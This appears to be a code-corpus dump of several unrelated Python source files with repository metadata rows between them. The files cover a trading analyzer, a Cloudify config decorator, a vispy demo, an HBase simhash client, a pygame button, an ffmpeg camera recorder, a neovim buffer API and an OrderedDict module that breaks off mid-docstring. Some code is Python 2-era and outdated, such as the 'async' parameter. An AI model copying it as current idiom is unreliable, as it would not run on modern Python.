#!/usr/bin/env python # -*- coding: utf-8; py-indent-offset:4 -*- ############################################################################### # # Copyright (C) 2015-2020 Daniel Rodriguez # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################### from __future__ import (absolute_import, division, print_function, unicode_literals) import collections import math import backtrader as bt __all__ = ['LogReturnsRolling'] class LogReturnsRolling(bt.TimeFrameAnalyzerBase): '''This analyzer calculates rolling returns for a given timeframe and compression Params: - ``timeframe`` (default: ``None``) If ``None`` the ``timeframe`` of the 1st data in the system will be used Pass ``TimeFrame.NoTimeFrame`` to consider the entire dataset with no time constraints - ``compression`` (default: ``None``) Only used for sub-day timeframes to for example work on an hourly timeframe by specifying "TimeFrame.Minutes" and 60 as compression If ``None`` then the compression of the 1st data of the system will be used - ``data`` (default: ``None``) Reference asset to track instead of the portfolio value. .. note:: this data must have been added to a ``cerebro`` instance with ``addata``, ``resampledata`` or ``replaydata`` - ``firstopen`` (default: ``True``) When tracking the returns of a ``data`` the following is done when crossing a timeframe boundary, for example ``Years``: - Last ``close`` of previous year is used as the reference price to see the return in the current year The problem is the 1st calculation, because the data has** no previous** closing price. As such and when this parameter is ``True`` the *opening* price will be used for the 1st calculation. This requires the data feed to have an ``open`` price (for ``close`` the standard [0] notation will be used without reference to a field price) Else the initial close will be used. - ``fund`` (default: ``None``) If ``None`` the actual mode of the broker (fundmode - True/False) will be autodetected to decide if the returns are based on the total net asset value or on the fund value. See ``set_fundmode`` in the broker documentation Set it to ``True`` or ``False`` for a specific behavior Methods: - get_analysis Returns a dictionary with returns as values and the datetime points for each return as keys ''' params = ( ('data', None), ('firstopen', True), ('fund', None), ) def start(self): super(LogReturnsRolling, self).start() if self.p.fund is None: self._fundmode = self.strategy.broker.fundmode else: self._fundmode = self.p.fund self._values = collections.deque([float('Nan')] * self.compression, maxlen=self.compression) if self.p.data is None: # keep the initial portfolio value if not tracing a data if not self._fundmode: self._lastvalue = self.strategy.broker.getvalue() else: self._lastvalue = self.strategy.broker.fundvalue def notify_fund(self, cash, value, fundvalue, shares): if not self._fundmode: self._value = value if self.p.data is None else self.p.data[0] else: self._value = fundvalue if self.p.data is None else self.p.data[0] def _on_dt_over(self): # next is called in a new timeframe period if self.p.data is None or len(self.p.data) > 1: # Not tracking a data feed or data feed has data already vst = self._lastvalue # update value_start to last else: # The 1st tick has no previous reference, use the opening price vst = self.p.data.open[0] if self.p.firstopen else self.p.data[0] self._values.append(vst) # push values backwards (and out) def next(self): # Calculate the return super(LogReturnsRolling, self).next() self.rets[self.dtkey] = math.log(self._value / self._values[0]) self._lastvalue = self._value # keep last value
gpl-3.0
-3,908,883,812,775,189,000
34.857143
79
0.60996
false
4.27234
false
false
false
codilime/cloudify-agent
cloudify_agent/installer/config/decorators.py
1
5377
######### # Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # * See the License for the specific language governing permissions and # * limitations under the License. from functools import wraps from cloudify import ctx from cloudify import context from cloudify_agent.installer.config.attributes import AGENT_ATTRIBUTES def attribute(name): def decorator(function): @wraps(function) def wrapper(cloudify_agent): # if the property was given in the invocation, use it. # inputs are first in precedence order if _update_agent_property(name, props=cloudify_agent, final_props=cloudify_agent): return if ctx.type == context.NODE_INSTANCE: # if the property is inside a runtime property, use it. # runtime properties are second in precedence order runtime_properties = ctx.instance.runtime_properties.get( 'cloudify_agent', {}) if _update_agent_property(name, props=runtime_properties, final_props=cloudify_agent): return # if the property is declared on the node, use it # node properties are third in precedence order node_properties = ctx.node.properties.get( 'cloudify_agent', {}) node_properties.update(ctx.node.properties.get( 'agent_config', {})) if _update_agent_property(name, props=node_properties, final_props=cloudify_agent): return # if the property is inside the bootstrap context, # and its value is not None, use it # bootstrap_context is forth in precedence order attr = AGENT_ATTRIBUTES.get(name) if attr is None: raise RuntimeError('{0} is not an agent attribute' .format(name)) agent_context = ctx.bootstrap_context.cloudify_agent.\ _cloudify_agent or {} context_attribute = attr.get('context_attribute', name) if _update_agent_property(context_attribute, props=agent_context, final_props=cloudify_agent, final_key=name): return if _update_agent_property(name, props=agent_context, final_props=cloudify_agent): return # apply the function itself ctx.logger.debug('Applying function:{0} on Attribute ' '<{1}>'.format(function.__name__, name)) value = function(cloudify_agent) if value is not None: ctx.logger.debug('{0} set by function:{1}' .format(name, value)) cloudify_agent[name] = value return # set default value default = attr.get('default') if default is not None: ctx.logger.debug('{0} set by default value' .format(name, value)) cloudify_agent[name] = default return return wrapper return decorator def group(name): def decorator(group_function): @wraps(group_function) def wrapper(cloudify_agent, *args, **kwargs): # collect all attributes belonging to that group group_attributes = {} for attr_name, attr_value in AGENT_ATTRIBUTES.iteritems(): if attr_value.get('group') == name: group_attributes[attr_name] = attr_value for group_attr_name in group_attributes.iterkeys(): # iterate and try to set all the attributes of the group as # defined in the heuristics of @attribute. @attribute(group_attr_name) def setter(_): pass setter(cloudify_agent) # when we are done, invoke the group function to # apply group logic group_function(cloudify_agent, *args, **kwargs) return wrapper return decorator def _update_agent_property(name, props, final_props, final_key=None): final_key = final_key or name extra_props = props.get('extra', {}) if name in extra_props: final_props[final_key] = extra_props[name] return True if name in props: final_props[final_key] = props[name] return True return False
apache-2.0
-2,597,727,802,150,284,000
36.340278
77
0.53766
false
4.874887
false
false
false
liubenyuan/vispy-tutorial
examples/04-tetrahedron.py
1
4445
# pylint: disable=invalid-name, no-member, unused-argument """ passing varyings to fragment """ import numpy as np from vispy import app, gloo from vispy.util.transforms import translate, perspective, rotate # note the 'color' and 'v_color' in vertex vertex = """ uniform mat4 u_model; // Model matrix uniform mat4 u_view; // View matrix uniform mat4 u_projection; // Projection matrix uniform vec4 u_color; // mask color for edge plotting attribute vec3 a_position; attribute vec4 a_color; varying vec4 v_color; void main() { gl_Position = u_projection * u_view * u_model * vec4(a_position, 1.0); v_color = a_color * u_color; } """ # note the varying 'v_color', it must has the same name as in the vertex. fragment = """ varying vec4 v_color; void main() { gl_FragColor = v_color; } """ class Canvas(app.Canvas): """ build canvas class for this demo """ def __init__(self): """ initialize the canvas """ app.Canvas.__init__(self, size=(512, 512), title='scaling quad', keys='interactive') # shader program tet = gloo.Program(vert=vertex, frag=fragment) # vertices V = np.array([(0, 0, 0), (1, 0, 0), (1.0/2.0, np.sqrt(3.0)/2.0, 0), (1.0/2.0, np.sqrt(3.0)/6.0, np.sqrt(2.0/3.0))], dtype=np.float32) # triangles specified by connecting matrix, # it can also be initialized using itertools I = np.array([(0, 1, 2), (0, 3, 1), (0, 2, 3), (1, 3, 2)], dtype=np.uint32) # edges, used for drawing outline E = np.array([(0, 1), (1, 2), (2, 0), (1, 3), (2, 3), (0, 3)], dtype=np.uint32) # colors of vertices C = np.array([(1, 0, 0, 1), (0, 1, 0, 1), (0, 0, 1, 1), (1, 1, 0, 1)], dtype=np.float32) # bind to data tet['a_position'] = V tet['a_color'] = C self.I = gloo.IndexBuffer(I) self.E = gloo.IndexBuffer(E) # intialize transformation matrix view = np.eye(4, dtype=np.float32) model = np.eye(4, dtype=np.float32) projection = np.eye(4, dtype=np.float32) # set view view = translate((0, 0, -5)) tet['u_model'] = model tet['u_view'] = view tet['u_projection'] = projection # bind your program self.program = tet # config and set viewport gloo.set_viewport(0, 0, *self.physical_size) gloo.set_clear_color('white') gloo.set_state('translucent') gloo.set_polygon_offset(1.0, 1.0) # bind a timer self.timer = app.Timer('auto', self.on_timer) self.theta = 0.0 self.phi = 0.0 self.timer.start() # show the canvas self.show() def on_resize(self, event): """ canvas resize callback """ ratio = event.physical_size[0] / float(event.physical_size[1]) self.program['u_projection'] = perspective(45.0, ratio, 2.0, 10.0) gloo.set_viewport(0, 0, *event.physical_size) def on_draw(self, event): """ canvas update callback """ gloo.clear() # Filled cube gloo.set_state(blend=True, depth_test=False, polygon_offset_fill=True) self.program['u_color'] = [1.0, 1.0, 1.0, 0.8] self.program.draw('triangles', self.I) # draw outline gloo.set_state(blend=False, depth_test=False, polygon_offset_fill=True) self.program['u_color'] = [0.0, 0.0, 0.0, 1.0] self.program.draw('lines', self.E) def on_timer(self, event): """ canvas time-out callback """ self.theta += .5 self.phi += .5 # note the convention is, theta is applied first and then phi # see vispy.utils.transforms, # python is row-major and opengl is column major, # so the rotate function transposes the output. model = np.dot(rotate(self.theta, (0, 1, 0)), rotate(self.phi, (0, 0, 1))) self.program['u_model'] = model self.update() # Finally, we show the canvas and we run the application. c = Canvas() app.run()
apache-2.0
7,396,573,617,910,617,000
30.524823
74
0.525309
false
3.39313
false
false
false
seomoz/simhash-db-py
simhash_db/hbase_client.py
1
3893
#! /usr/bin/env python '''Our code to connect to the HBase backend. It uses the happybase package, which depends on the Thrift service that (for now) is part of HBase.''' from gevent import monkey monkey.patch_all() import struct import happybase import Hbase_thrift from . import BaseClient def column_name(integer): '''Convert an integer to a column name.''' return 'f%02d:c' % integer class Client(BaseClient): '''Our HBase backend client''' def __init__(self, name, num_blocks, num_bits, *args, **kwargs): BaseClient.__init__(self, name, num_blocks, num_bits) # Time to live in seconds ttl = kwargs.pop('ttl', None) if ttl is None: raise ValueError self.connection = happybase.Connection(**kwargs) families = {column_name(i): dict(time_to_live=ttl) for i in range(self.num_tables)} try: self.connection.create_table(name, families) except Hbase_thrift.AlreadyExists: pass self.table = self.connection.table(name) def delete(self): '''Delete this database of simhashes''' if self.table is not None: self.connection.delete_table(self.name, disable=True) self.table = None def insert(self, hash_or_hashes): '''Insert one (or many) hashes into the database''' if self.table is None: return hashes = hash_or_hashes if not hasattr(hash_or_hashes, '__iter__'): hashes = [hash_or_hashes] for hsh in hashes: for i in range(self.num_tables): row_key = struct.pack('!Q', long(self.corpus.tables[i].permute(hsh))) self.table.put(row_key, {column_name(i): None}) def find_in_table(self, hsh, table_num, ranges): '''Return all the results found in this particular table''' low = struct.pack('!Q', ranges[table_num][0]) high = struct.pack('!Q', ranges[table_num][1]) pairs = self.table.scan(row_start=low, row_stop=high, columns=[column_name(table_num)]) results = [struct.unpack('!Q', k)[0] for k, v in pairs] results = [self.corpus.tables[table_num].unpermute(d) for d in results] return [h for h in results if self.corpus.distance(h, hsh) <= self.num_bits] def find_one(self, hash_or_hashes): '''Find one near-duplicate for the provided query (or queries)''' if self.table is None: return None hashes = hash_or_hashes if not hasattr(hash_or_hashes, '__iter__'): hashes = [hash_or_hashes] results = [] for hsh in hashes: ranges = self.ranges(hsh) found = [] for i in range(self.num_tables): found = self.find_in_table(hsh, i, ranges) if found: results.append(found[0]) break if not found: results.append(None) if not hasattr(hash_or_hashes, '__iter__'): return results[0] return results def find_all(self, hash_or_hashes): '''Find all near-duplicates for the provided query (or queries)''' if self.table is None: return None hashes = hash_or_hashes if not hasattr(hash_or_hashes, '__iter__'): hashes = [hash_or_hashes] results = [] for hsh in hashes: ranges = self.ranges(hsh) found = [] for i in range(self.num_tables): found.extend(self.find_in_table(hsh, i, ranges)) found = list(set(found)) results.append(found) if not hasattr(hash_or_hashes, '__iter__'): return results[0] return results
mit
7,742,667,128,239,649,000
31.714286
79
0.553301
false
3.936299
false
false
false
awes0menessInc/python-projects
Alien-Invasion/button.py
1
1269
import pygame.font class Button(): """ A class to create a button. """ def __init__(self, screen, msg): """Initialize button attributes.""" self.screen = screen self.screen_rect = screen.get_rect() # Set the dimensions and properties of the button. self.width, self.height = 200, 50 self.button_color = (0, 255, 0) self.text_color = (255, 255, 255) self.font = pygame.font.SysFont(None, 48) # Build the button's rect object and center it. self.rect = pygame.Rect(0, 0, self.width, self.height) self.rect.center = self.screen_rect.center # The button message needs to be prepped only once. self.prep_msg(msg) def prep_msg(self, msg): """Turn msg into a rendered image and center text on the button.""" self.msg_image = self.font.render(msg, True, self.text_color, self.button_color) self.msg_image_rect = self.msg_image.get_rect() self.msg_image_rect.center = self.rect.center def draw_button(self): # Draw blank button and then draw message. self.screen.fill(self.button_color, self.rect) self.screen.blit(self.msg_image, self.msg_image_rect)
mit
4,828,632,466,260,825,000
35.257143
75
0.602049
false
3.754438
false
false
false
msfrank/mandelbrot
mandelbrot/registry.py
1
3001
# Copyright 2015 Michael Frank <msfrank@syntaxjockey.com> # # This file is part of Mandelbrot. # # Mandelbrot is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Mandelbrot is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Mandelbrot. If not, see <http://www.gnu.org/licenses/>. import pkg_resources import logging log = logging.getLogger("mandelbrot.registry") from mandelbrot import versionstring require_mandelbrot = 'mandelbrot == ' + versionstring() class Registry(object): """ """ def __init__(self): self.env = pkg_resources.Environment([]) plugins,errors = pkg_resources.working_set.find_plugins(self.env) for plugin in plugins: pkg_resources.working_set.add(plugin) for error in errors: log.info("failed to load distribution: %s", error) self.overrides = {} def override_factory(self, entry_point_type, factory_name, factory): """ :param entry_point_type: :type entry_point_type: str :param factory_name: :type factory_name: str :param factory: :type factory: type """ self.overrides[(entry_point_type,factory_name)] = factory def lookup_factory(self, entry_point_type, factory_name, factory_type, requirement=require_mandelbrot): """ :param entry_point_type: :type entry_point_type: str :param factory_name: :type factory_name: str :param factory_type: :type factory_type: type :param requirement: :type requirement: str """ log.debug("looking up '%s' of type %s with requirement %s", factory_name, entry_point_type, requirement) # check factory overrides first if (entry_point_type,factory_name) in self.overrides: factory = self.overrides[(entry_point_type,factory_name)] # find the entrypoint matching the specified requirement else: requirement = pkg_resources.Requirement.parse(requirement) distribution = pkg_resources.working_set.find(requirement) factory = distribution.load_entry_point(entry_point_type, factory_name) log.debug("loaded factory %s.%s", factory.__module__, factory.__class__.__name__) # verify that the factory is the correct type if not issubclass(factory, factory_type): raise TypeError("{}.{} is not a subclass of {}".format( factory.__module__, factory.__class__.__name__, factory_type.__name__)) return factory
gpl-3.0
-5,360,309,663,945,176,000
39.013333
107
0.654782
false
4.088556
false
false
false
lunixbochs/actualvim
lib/neovim/api/buffer.py
1
6063
"""API for working with a Nvim Buffer.""" from .common import Remote from ..compat import IS_PYTHON3 __all__ = ('Buffer') if IS_PYTHON3: basestring = str def adjust_index(idx, default=None): """Convert from python indexing convention to nvim indexing convention.""" if idx is None: return default elif idx < 0: return idx - 1 else: return idx class Buffer(Remote): """A remote Nvim buffer.""" _api_prefix = "nvim_buf_" def __len__(self): """Return the number of lines contained in a Buffer.""" return self.request('buffer_line_count') def _get_lines(self, start, end, strict): lines = self.request_raw('nvim_buf_get_lines', start, end, strict) return [line.decode('utf8') for line in lines] def _set_lines(self, start, end, strict, lines): lines = [line.encode('utf8') for line in lines] return self.request_raw('nvim_buf_set_lines', start, end, strict, lines) def __getitem__(self, idx): """Get a buffer line or slice by integer index. Indexes may be negative to specify positions from the end of the buffer. For example, -1 is the last line, -2 is the line before that and so on. When retrieving slices, omiting indexes(eg: `buffer[:]`) will bring the whole buffer. """ if not isinstance(idx, slice): i = adjust_index(idx) return self._get_lines(i, i + 1, True)[0] start = adjust_index(idx.start, 0) end = adjust_index(idx.stop, -1) return self._get_lines(start, end, False) def __setitem__(self, idx, item): """Replace a buffer line or slice by integer index. Like with `__getitem__`, indexes may be negative. When replacing slices, omiting indexes(eg: `buffer[:]`) will replace the whole buffer. """ if not isinstance(idx, slice): i = adjust_index(idx) lines = [item] if item is not None else [] return self._set_lines(i, i + 1, True, lines) lines = item if item is not None else [] start = adjust_index(idx.start, 0) end = adjust_index(idx.stop, -1) return self._set_lines(start, end, False, lines) def __iter__(self): """Iterate lines of a buffer. This will retrieve all lines locally before iteration starts. This approach is used because for most cases, the gain is much greater by minimizing the number of API calls by transfering all data needed to work. """ lines = self[:] for line in lines: yield line def __delitem__(self, idx): """Delete line or slice of lines from the buffer. This is the same as __setitem__(idx, []) """ self.__setitem__(idx, None) def append(self, lines, index=-1): """Append a string or list of lines to the buffer.""" if isinstance(lines, (basestring, bytes)): lines = [lines] return self._set_lines(index, index, True, lines) def mark(self, name): """Return (row, col) tuple for a named mark.""" return self.request('nvim_buf_get_mark', name) def range(self, start, end): """Return a `Range` object, which represents part of the Buffer.""" return Range(self, start, end) def add_highlight(self, hl_group, line, col_start=0, col_end=-1, src_id=-1, async=None): """Add a highlight to the buffer.""" if async is None: async = (src_id != 0) return self.request('nvim_buf_add_highlight', src_id, hl_group, line, col_start, col_end, async=async) def clear_highlight(self, src_id, line_start=0, line_end=-1, async=True): """Clear highlights from the buffer.""" self.request('nvim_buf_clear_highlight', src_id, line_start, line_end, async=async) @property def name(self): """Get the buffer name.""" return self.request('nvim_buf_get_name') @name.setter def name(self, value): """Set the buffer name. BufFilePre/BufFilePost are triggered.""" return self.request('nvim_buf_set_name', value) @property def valid(self): """Return True if the buffer still exists.""" return self.request('nvim_buf_is_valid') @property def number(self): """Get the buffer number.""" return self.handle class Range(object): def __init__(self, buffer, start, end): self._buffer = buffer self.start = start - 1 self.end = end - 1 def __len__(self): return self.end - self.start + 1 def __getitem__(self, idx): if not isinstance(idx, slice): return self._buffer[self._normalize_index(idx)] start = self._normalize_index(idx.start) end = self._normalize_index(idx.stop) if start is None: start = self.start if end is None: end = self.end + 1 return self._buffer[start:end] def __setitem__(self, idx, lines): if not isinstance(idx, slice): self._buffer[self._normalize_index(idx)] = lines return start = self._normalize_index(idx.start) end = self._normalize_index(idx.stop) if start is None: start = self.start if end is None: end = self.end + 1 self._buffer[start:end] = lines def __iter__(self): for i in range(self.start, self.end + 1): yield self._buffer[i] def append(self, lines, i=None): i = self._normalize_index(i) if i is None: i = self.end + 1 self._buffer.append(lines, i) def _normalize_index(self, index): if index is None: return None if index < 0: index = self.end else: index += self.start if index > self.end: index = self.end return index
mit
3,638,414,735,793,391,600
30.414508
80
0.568036
false
3.937013
false
false
false
mikehankey/fireball_camera
ffmpeg_record.py
1
2859
#!/usr/bin/python3 import glob import sys import subprocess import os import time video_dir = "/mnt/ams2" def check_running(cam_num, type): if type == "HD": cmd = "ps -aux |grep \"ffmpeg\" | grep \"HD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l" else: cmd = "ps -aux |grep \"ffmpeg\" | grep \"SD\" | grep \"cam" + cam_num + "\" | grep -v grep | wc -l" print(cmd) output = subprocess.check_output(cmd, shell=True).decode("utf-8") output = int(output.replace("\n", "")) return(int(output)) def start_capture(cam_num): running = check_running(cam_num, "HD") if running == 0: cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_0 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/HD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & " print(cmd) os.system(cmd) time.sleep(2) else: print ("ffmpeg already running for cam:", cam_num) running = check_running(cam_num, "SD") if running == 0: cmd = "/usr/bin/ffmpeg -i rtsp://192.168.76.7" + cam_num + "/av0_1 -c copy -map 0 -f segment -strftime 1 -segment_time 60 -segment_format mp4 \"" + video_dir + "/SD/" + "%Y-%m-%d_%H-%M-%S-cam" + cam_num + ".mp4\" 2>&1 > /dev/null & " print(cmd) os.system(cmd) time.sleep(2) else: print ("ffmpeg already running for cam:", cam_num) def stop_capture(cam_num): #print ("Stopping capture for ", cam_num) cmd = "kill -9 `ps -aux | grep ffmpeg |grep -v grep| awk '{print $2}'`" output = subprocess.check_output(cmd, shell=True).decode("utf-8") print (output) def purge(cam_num): cur_time = int(time.time()) #cmd = "rm " + cam_num + "/*" #print (cmd) #os.system(cmd) for filename in (glob.glob(video_dir + '/' + cam_num + '/*.mp4')): st = os.stat(filename) mtime = st.st_mtime tdiff = cur_time - mtime tdiff = tdiff / 60 / 60 / 24 if tdiff >= .8: cmd = "rm " + filename print(cmd) os.system(cmd) #file_list.append(filename) try: cmd = sys.argv[1] cam_num = sys.argv[2] except: do_all = 1 if (cmd == "stop"): stop_capture("1") if (cmd == "start"): start_capture(cam_num) if (cmd == "start_all"): start_capture("1") start_capture("2") start_capture("3") start_capture("4") start_capture("5") start_capture("6") if (cmd == "purge"): purge(cam_num) if (cmd == "check_running"): running = check_running(cam_num, "HD") print (running) running = check_running(cam_num, "SD") print (running) if (cmd == "purge_all"): purge("1") purge("2") purge("3") purge("4") purge("5") purge("6") #ffmpeg -i rtsp://192.168.76.71/av0_1 -c copy -map 0 -f segment -segment_time 60 -segment_format mp4 "1/capture-1-%03d.mp4" &
gpl-3.0
4,738,862,852,939,186,000
25.971698
239
0.564533
false
2.841948
false
false
false
release-engineering/fedmsg_meta_umb
fedmsg_meta_umb/rpmdiff.py
1
2379
# Copyright (C) 2017 Red Hat, Inc. # # fedmsg_meta_umb is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # fedmsg_meta_umb is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with fedmsg; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # # Authors: Ralph Bean <rbean@redhat.com> from fedmsg.meta.base import BaseProcessor class RPMDiffProcessor(BaseProcessor): topic_prefix_re = r'/topic/VirtualTopic\.eng' __name__ = 'rpmdiff' __description__ = 'the rpmdiff analysis system' __link__ = 'https://rpmdiff.engineering.redhat.com/' __docs__ = 'https://docs.engineering.redhat.com/display/EXD/rpmdiff' __obj__ = 'RPMDiff Analysis System' __icon__ = '_static/img/icons/erratatool50.png' def title(self, msg, **config): return msg['topic'].split('.', 2)[-1] def subtitle(self, msg, **config): action = self.title(msg, **config).split('.')[-1] if msg['msg']['type'] == 'COMPARISON': kwargs = dict( action=action, package=msg['msg']['package_name'], baseline='-'.join(msg['msg']['baseline'].rsplit('-', 2)[1:]), target='-'.join(msg['msg']['nvr'].rsplit('-', 2)[1:]), ) template = ('rpmdiff comparison of {package} is {action} ' '({target} against {baseline})') return template.format(**kwargs) elif msg['msg']['type'] == 'ANALYSIS': kwargs = dict(action=action, nvr=msg['msg']['nvr']) template = 'rpmdiff analysis of {nvr} is {action}' return template.format(**kwargs) def packages(self, msg, **config): return set([msg['msg']['package_name']]) def link(self, msg, **config): template = 'https://rpmdiff.engineering.redhat.com/run/{run_id}/' return template.format(**msg['msg'])
lgpl-2.1
5,623,728,822,967,871,000
40.736842
78
0.623792
false
3.800319
false
false
false
jesuscript/topo-mpi
param/external.py
1
68357
""" External code required for param/tkinter interface. * odict: an ordered dictionary * tilewrapper: a wrapper for Tile/ttk widgets Note that an ordered dictionary and a wrapper for ttk widgets are both available in Python 2.7. """ from __future__ import generators # odict.py # An Ordered Dictionary object # Copyright (C) 2005 Nicola Larosa, Michael Foord # E-mail: nico AT tekNico DOT net, fuzzyman AT voidspace DOT org DOT uk # This software is licensed under the terms of the BSD license. # http://www.voidspace.org.uk/python/license.shtml # Basically you're free to copy, modify, distribute and relicense it, # So long as you keep a copy of the license with it. # Documentation at http://www.voidspace.org.uk/python/odict.html # For information about bugfixes, updates and support, please join the # Pythonutils mailing list: # http://groups.google.com/group/pythonutils/ # Comments, suggestions and bug reports welcome. """A dict that keeps keys in insertion order""" __author__ = ('Nicola Larosa <nico-NoSp@m-tekNico.net>,' 'Michael Foord <fuzzyman AT voidspace DOT org DOT uk>') __docformat__ = "restructuredtext en" __revision__ = '$Id$' __version__ = '0.2.2' __all__ = ['OrderedDict', 'SequenceOrderedDict'] import sys INTP_VER = sys.version_info[:2] if INTP_VER < (2, 2): raise RuntimeError("Python v.2.2 or later required") import types, warnings class OrderedDict(dict): """ A class of dictionary that keeps the insertion order of keys. All appropriate methods return keys, items, or values in an ordered way. All normal dictionary methods are available. Update and comparison is restricted to other OrderedDict objects. Various sequence methods are available, including the ability to explicitly mutate the key ordering. __contains__ tests: >>> d = OrderedDict(((1, 3),)) >>> 1 in d 1 >>> 4 in d 0 __getitem__ tests: >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[2] 1 >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[4] Traceback (most recent call last): KeyError: 4 __len__ tests: >>> len(OrderedDict()) 0 >>> len(OrderedDict(((1, 3), (3, 2), (2, 1)))) 3 get tests: >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.get(1) 3 >>> d.get(4) is None 1 >>> d.get(4, 5) 5 >>> d OrderedDict([(1, 3), (3, 2), (2, 1)]) has_key tests: >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d.has_key(1) 1 >>> d.has_key(4) 0 """ def __init__(self, init_val=(), strict=False): """ Create a new ordered dictionary. Cannot init from a normal dict, nor from kwargs, since items order is undefined in those cases. If the ``strict`` keyword argument is ``True`` (``False`` is the default) then when doing slice assignment - the ``OrderedDict`` you are assigning from *must not* contain any keys in the remaining dict. >>> OrderedDict() OrderedDict([]) >>> OrderedDict({1: 1}) Traceback (most recent call last): TypeError: undefined order, cannot get items from dict >>> OrderedDict({1: 1}.items()) OrderedDict([(1, 1)]) >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d OrderedDict([(1, 3), (3, 2), (2, 1)]) >>> OrderedDict(d) OrderedDict([(1, 3), (3, 2), (2, 1)]) """ self.strict = strict dict.__init__(self) if isinstance(init_val, OrderedDict): self._sequence = init_val.keys() dict.update(self, init_val) elif isinstance(init_val, dict): # we lose compatibility with other ordered dict types this way raise TypeError('undefined order, cannot get items from dict') else: self._sequence = [] self.update(init_val) ### Special methods ### def __delitem__(self, key): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> del d[3] >>> d OrderedDict([(1, 3), (2, 1)]) >>> del d[3] Traceback (most recent call last): KeyError: 3 >>> d[3] = 2 >>> d OrderedDict([(1, 3), (2, 1), (3, 2)]) >>> del d[0:1] >>> d OrderedDict([(2, 1), (3, 2)]) """ if isinstance(key, types.SliceType): # FIXME: efficiency? keys = self._sequence[key] for entry in keys: dict.__delitem__(self, entry) del self._sequence[key] else: # do the dict.__delitem__ *first* as it raises # the more appropriate error dict.__delitem__(self, key) self._sequence.remove(key) def __eq__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d == OrderedDict(d) True >>> d == OrderedDict(((1, 3), (2, 1), (3, 2))) False >>> d == OrderedDict(((1, 0), (3, 2), (2, 1))) False >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) False >>> d == dict(d) False >>> d == False False """ if isinstance(other, OrderedDict): # FIXME: efficiency? # Generate both item lists for each compare return (self.items() == other.items()) else: return False def __lt__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> c < d True >>> d < c False >>> d < dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() < other.items()) def __le__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> e = OrderedDict(d) >>> c <= d True >>> d <= c False >>> d <= dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts >>> d <= e True """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() <= other.items()) def __ne__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> d != OrderedDict(d) False >>> d != OrderedDict(((1, 3), (2, 1), (3, 2))) True >>> d != OrderedDict(((1, 0), (3, 2), (2, 1))) True >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) False >>> d != dict(d) True >>> d != False True """ if isinstance(other, OrderedDict): # FIXME: efficiency? # Generate both item lists for each compare return not (self.items() == other.items()) else: return True def __gt__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> d > c True >>> c > d False >>> d > dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() > other.items()) def __ge__(self, other): """ >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) >>> e = OrderedDict(d) >>> c >= d False >>> d >= c True >>> d >= dict(c) Traceback (most recent call last): TypeError: Can only compare with other OrderedDicts >>> e >= d True """ if not isinstance(other, OrderedDict): raise TypeError('Can only compare with other OrderedDicts') # FIXME: efficiency? # Generate both item lists for each compare return (self.items() >= other.items()) def __repr__(self): """ Used for __repr__ and __str__ >>> r1 = repr(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) >>> r1 "OrderedDict([('a', 'b'), ('c', 'd'), ('e', 